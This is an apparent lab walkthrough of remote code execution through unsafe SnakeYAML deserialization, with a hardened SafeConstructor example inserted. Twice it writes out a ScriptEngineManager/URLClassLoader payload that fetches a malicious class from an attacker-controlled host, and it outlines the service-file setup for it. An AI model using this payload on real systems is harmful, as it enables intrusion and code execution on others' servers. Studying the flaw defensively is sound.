SnakeYaml Deserialization exploited

Yaml yaml = new Yaml();
Object obj = yaml.load(<--user input data-->);
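Added example (not code from the article): the loader pattern shown above, kept only for comparison, beside a hardened loader built on SafeConstructor, which knows only the standard YAML tags and therefore rejects a document tagged `!!javax.script.ScriptEngineManager` instead of resolving it to a Java class. It assumes SnakeYAML 1.33 or 2.x on the classpath (the `SafeConstructor(LoaderOptions)` constructor); the class name, method names and the two sample documents are my own.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

// Unsafe loader from the article beside a loader that only builds plain YAML data
// (maps, lists, strings, numbers) and never instantiates application classes.
public class SafeYamlLoading {

    // Constructed input: the global tag from the article's payload, with no arguments.
    static final String TAGGED_DOC = "!!javax.script.ScriptEngineManager []";
    // Constructed input: ordinary configuration data a web form would be expected to send.
    static final String PLAIN_DOC = "port: 8081\nname: demo";

    // The pattern from the article (SnakeYAML 1.x): the default Constructor resolves
    // any !!fully.qualified.Class tag to that class. Shown for comparison only.
    static Object loadUnsafe(String userInput) {
        Yaml yaml = new Yaml();
        return yaml.load(userInput);
    }

    // Hardened form: SafeConstructor fails at construction time on any tag that names
    // a Java class, so untrusted input can only ever produce plain collections.
    static Object loadSafe(String userInput) {
        LoaderOptions opts = new LoaderOptions();
        opts.setMaxAliasesForCollections(50); // also limits alias-expansion ("billion laughs") input
        opts.setCodePointLimit(1024 * 1024);  // cap a single document at 1 MiB of text
        Yaml yaml = new Yaml(new SafeConstructor(opts));
        return yaml.load(userInput);
    }

    public static void main(String[] args) {
        System.out.println("safe/plain  : " + loadSafe(PLAIN_DOC)); // {port=8081, name=demo}
        try {
            loadSafe(TAGGED_DOC);
            System.out.println("safe/tagged : constructed (unexpected)");
        } catch (YAMLException e) {
            // Expected: ConstructorException "could not determine a constructor for the tag ..."
            System.out.println("safe/tagged : rejected -> " + e.getMessage());
        }
    }
}
```

On SnakeYAML 2.x the default `new Yaml()` also refuses global tags unless a permissive TagInspector is configured, but SafeConstructor is the explicit choice whenever only data, not objects, is expected from the input.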
Changing the default port of Apache Tomcat
Include SnakeYAML library support in Spring Boot
Web UI for YAML data entry
YAML data parser testing from the UI and Burp Suite proxy
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

javac <name-of-the-java-file>.java

Now we have our .class file in place. I then created the folder structure “META-INF -> services” and within it created the file “javax.script.ScriptEngineFactory” with the content “snakeyaml.exploit”.

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
Remote Code Execution successful
